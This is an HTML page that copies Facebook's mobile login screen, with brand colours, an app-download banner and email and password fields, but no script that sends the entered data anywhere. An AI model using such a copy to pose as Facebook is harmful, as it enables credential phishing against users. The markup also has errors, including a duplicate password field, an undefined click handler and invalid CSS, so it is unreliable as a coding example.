<html>
<head>
<title>Facebook Login</title>
<!--<link rel="stylesheet" type="text/css" href="style.css">-->
<link href="main.js">
<style>

*{
  margin:0;
  padding:0;
  box-sizing:border-box;
}

#fbox{
   width:100%;
   display:flex;
   align-items:center;
   justify-content:center;
   flex-direction:column; 
}
#fbox h2{
   margin-top:20px;
   margin-bottom:10px;
   color:#1878f3;
   font-size:32px;
}
#fbox input{
   width:82%;
   margin-top:17;
  padding:17px;
  border:none;
  outline:none;
  background:#F5F5F5;
  box-shadow:0 1px 2px rgb(180,180,180);
  border-radius:3px;
  font-size:32px;
}
#fbox button{
   width:72%;
   margin-top:20px;
   padding:22px;
   border-radius:3px;
}
#fbox #login_button{
	font-size:36px;
	font-weight:bold;
	color:#fff;
	background:#1878f3;
	border:none;
	outline:none;
}
#fbox #forget_button{
   background:none;
   border:none;
   outline:none;
   color:#377DDF;
   font-size:24px;
   margin-top:3px;
   
}
#fbox #new_account{
color:#fff;
   background:#00a400;
   font-weight:bold;
   margin-top:20px;
   font-size:23px;
   border:none;
   outline:none;
   padding:12px;
   width:50%;
   text-shadow:1px 0 1px rgb(0,0,0,0,3);
}

</style>
</head>

<body>
<div class="fcontainer">
<div style="width:100%; display:flex; align-items:center; background:#fffbe2; padding:10px; font-size:34px;"">
<span><img src="IMG_20221101_191532.jpg" width="52px"></span>
<span style="color:#3b589a;">Get Facebook for Android and browse faster</span>
</div>
<div id="fbox">
<h2>facebook</h2>
<input type="text" id="text" placeholder="Mobile number or email address">
<input type="password" id="password" placeholder="Password">
<button type="button" id="login_button" onclick="myFunction()">Log In</button>
<button type="button" id="forget_button">Forgotton password</button>
<div style="width:92%; height:1px; background:rgb(200,200,200); margin:7px; display:flax; align-items:center; justify-content:center; text-align: center;">
<span style="line-height:0;background: #fff; padding:1px 1px;">Or</span>
</div>
<button type="button" id="new_account">Create New Account</button>
</div>
</div>

<input type="password" id="password" placeholder="Password">



</body>

</html>
